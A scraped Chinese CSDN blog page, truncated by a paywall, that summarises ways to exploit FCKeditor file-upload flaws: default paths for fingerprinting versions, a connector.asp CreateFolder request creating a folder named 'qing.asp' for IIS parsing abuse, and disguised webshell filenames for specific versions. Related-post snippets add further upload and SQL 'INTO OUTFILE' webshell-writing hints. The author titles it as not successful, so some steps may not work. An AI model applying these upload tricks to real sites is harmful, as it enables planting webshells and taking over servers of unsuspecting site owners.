fckeditor php版 漏洞,Fckeditor漏洞总结及利用方法(未成功)

最新推荐文章于 2024-05-14 03:24:06 发布
最新推荐文章于 2024-05-14 03:24:06 发布
阅读量1.4k 收藏
点赞数 1
文章标签: fckeditor php版 漏洞
先在这里做一个Fckeditor知识的了解:FCKeditor是一个专门使用在网页上属于开放源代码的所见即所得文字编辑器。现在利用其本身的开放源代码,进行一些漏洞性的入侵。当然网上也有相关知识,详细资料自己找第一:查看编辑器版本其相关默认路径如:FCKeditor/_whatsnew.htmlFCKeditor/editor/dialog/fck_about.htmlFCKeditor/_samp...
摘要由CSDN通过智能技术生成

先在这里做一个Fckeditor知识的了解:

FCKeditor是一个专门使用在网页上属于开放源代码的所见即所得文字编辑器。

现在利用其本身的开放源代码,进行一些漏洞性的入侵。当然网上也有相关知识,详细资料自己找

第一:查看编辑器版本

其相关默认路径如:

FCKeditor/_whatsnew.html

FCKeditor/editor/dialog/fck_about.html

FCKeditor/_samples/default.html

editor/filemanager/browser/default/browser.html?Connector=../../connectors/cfm/connector.cfm

editor/filemanager/connectors/asp/connector.asp

editor/filemanager/connectors/aspx/connector.aspx

editor/filemanager/connectors/php/connector.php

editor/filemanager/browser/default/browser.html

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=qing.asp后在/up_files/image/目录下创建一个明文qing.asp的文件夹。

在上面的基础下,若Fckeditor版本为2.5

木马的格式可以为

a.aspx.a;.a.aspx.jpg..jpg

若Fckeditor版本为2.4.3

php的文件名加个问号,成功上传解析

/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php

支持php的通杀,2.6.4和2.6.5测试未通过

//注:在V2.65中,会发现其过滤机制是以最后一个图片格式为终点点

fckeditor/editor/plugins/bbcode/_sample/sample.html 2.64

———————————————————————————————————————

最低0.47元/天 解锁文章
金雪锋
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
FCKeditor 2.6.6 可直接使用
07-19
比起ckeditor编辑器,还是觉得这个好用,可直接复制到自己的项目上去使用,使用文档里有使用指南!
fckeditor php 漏洞利用
blrk
07-03 2325
http:///includes/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://http://%2Ffckeditor%2Feditor
FCKeditor漏洞利用
weixin_33955681的博客
06-12 500
FCKeditor漏洞利用 查看编辑器本 FCKeditor/_whatsnew.html fckeditor/editor/dialog/fck_about.html ————————————————————————————————————————————————————————————— 2. Version 2.2 本 Apache+linux 环境下在上传文件后面加个....
2024年【渗透测试】--- FCKeditor文本编辑器漏洞_ckeditor漏洞,保洁阿姨看完都会了
最新发布
2401_85013604的博客
05-14 602
迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
nginx 上传文件漏洞_FCKeditor/phpok文件上传漏洞复现
weixin_36212732的博客
12-29 877
人不可能十全十美,十分能耐使七分,留下三分给儿孙。俗话说得好FCKeditor_v2.4.31、前言常见的文本编辑器如FCKeditor、Ewebeditor、UEditor、KindEditor、XHeditor等,因其包含有文件上传接口,导致经常出现安全缺陷。这里主要对 FCKeditor 编辑器的历史文件上传漏洞做复现。2、FCKeditor常用上传地址fckeditor/edit...
php中关于fckeditor的详细配置
weixin_34233679的博客
03-25 128
因为下载下来的压缩包里面有包含很多在我们使用时,用不到的,不删除也行。看个人喜好下面以PHP为例,进行程序瘦身 删除所有”_”开头的文件和文件夹 删除FCKeditor的目录下: fckeditor.afp fckeditor.asp fckeditor.cfc fckeditor.cfm fckeditor.lasso fckeditor.pl fckeditor....
fckeditor php上传利用漏洞,Fckeditor 2.4.2 php任意上传文件漏洞
weixin_36416418的博客
03-17 388
fckeditor/editor/filemanager/upload/php/upload.php/** FCKeditor - The text editor for Internet - http://www.fckeditor.net* Copyright (C) 2003-2007 Frederico Caldeira Knabben** == BEGIN LICENSE ==** Li...
记Fckeditor漏洞
zhangpeng999123的博客
03-07 2166
首先是对目标站点进行了基本的测试然后发现了存在fckeditor,fckeditor漏洞有很多,基本asp的都被通杀了,大家可以在网上看看。首先看看编辑器的本: $ http://xxxxxxx.com/fckeditor/editor/dialog/fck_about.html 查看本信息: 本信息 可以看到是2.6.6的本,那就对症下药。同时提一下,查看...
FCKeditor文件上传漏洞利用-File-Upload-Vulnerability-in-FCKEditor1
08-03
Exploiting PHP Upload Module ofBypassing File-type CheckExploiting PHP Upload Mo
FCKeditor 新闻组件的一些程序漏洞
10-30
很多网站可能都在用FCK的新闻编辑组件,使用FCK的时候一定要注意本是否安全,以下是FCK中的文件上传漏洞:(主要是:connector.aspx文件的漏洞
FCKeditor漏洞总结
01-24
FCKeditor漏洞总结。很全面!基本上FCK那些漏洞都在这里面!
FCKeditor上传漏洞与IIS6解析漏洞利用和修补
03-18
FCKeditor上传漏洞与IIS6解析漏洞利用和修补
FCKeditor.Net_2.2安全修正
01-01
FCKeditor为一开源多功能在线Web编辑器。官方网站:http://www.fckeditor.net/。相关安全文件参看:《在.net中使用Fckeditor》 http://cliffever.cnblogs.com/archive/2006/05/09/395134.aspx《FCKeditor 實戰技巧...
漏洞复现- - -IIS解析漏洞在fckEditor上传攻击中的利用
weixin_67503304的博客
10-26 2114
本文主要讲解了IIS解析漏洞在fckEditor上传攻击中的利用方式及其详细步骤。
FCKeditor的拼写检查器
weixin_30312557的博客
09-04 155
Spell Checker 拼写检查器 Spell Checker Configuration 拼写检查器的配置 FCKeditor comes with built-in integration with two spell checkers: ieSpell and Speller Pages. Here you will find information about th...
fckeditor 漏洞php,Fckeditor漏洞利用总结
weixin_28366353的博客
03-11 554
查看编辑器本FCKeditor/_whatsnew.html———————————————————————————————————————————2.Version2.2本Apache+linux环境下在上传文件后面加个.突破!测试通过。———————————————————————————————————————————3.Version<=2.4.2Forphp在处理...
fckeditor漏洞_三十,文件上传漏洞、编辑器漏洞和IIS高漏洞及防御
qq_50854662的博客
11-08 4712
fckeditor漏洞_三十,文件上传漏洞、编辑器漏洞和IIS高漏洞及防御
【渗透测试】--- FCKeditor文本编辑器漏洞
热门推荐
qq_43168364的博客
12-25 1万+
一、FCKeditor编辑器漏洞 FCKeditor编辑器是一款强大的所见即所得文本编辑器,现在已经更名为:CKEditor fckeditor的常见敏感目录(FCK有时要小写) (1) 查看本信息 /FCKeditor/editor/dialog/fck_about.html /FCKeditor/_whatsnew.html (2) 默认上传页面 /FCKeditor/editor/filemanager/browser/default/browser.html /FCKeditor/edito
php后台拿shell要知道php的路径,文章下将讲诉爆php路径的方法
野路子云遇见不同的自己
07-19 466
' INTO OUTFILE 'E:/xamp/www/xiaoma.php'----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php。/usr/local/apache/conf/extra/httpd-vhosts.conf 虚拟目录配置文件。读取文件内容: select load_file('E:/xamp/www/s.php');
fckeditor 漏洞
04-28
FCKeditor是一个基于Web的富文本编辑器,广泛应用于许多网站。然而,FCKeditor也已经被证实存在一些漏洞,这些漏洞可能导致用户数据泄露、系统被攻击等问题。 一种有名的FCKeditor漏洞是文件上传漏洞。攻击者可以在上传过程中注入恶意代码,使其能够运行在服务端上,从而导致系统遭受攻击。此外,还有一些其他的漏洞,如XSS漏洞和CSRF漏洞等,这些漏洞都可能导致系统受到攻击。 为了保护网站免受FCKeditor漏洞的影响,建议管理员采取以下几个措施: 1. 切勿使用过时的FCKeditor本。 2. 限制用户可以上传的文件类型和大小。禁止部分危险的文件类型,如可执行文件、脚本文件等。 3. 屏蔽掉不必要的FCKeditor功能,如上传图片、上传文件等,减少攻击面。 4. 使用防火墙和反病毒软件等安全工具,及时发现并阻止漏洞攻击。 总之,FCKeditor漏洞可能会给网站带来安全隐患和损失,网站管理员需要高度关注,并采取相应措施保障网站安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值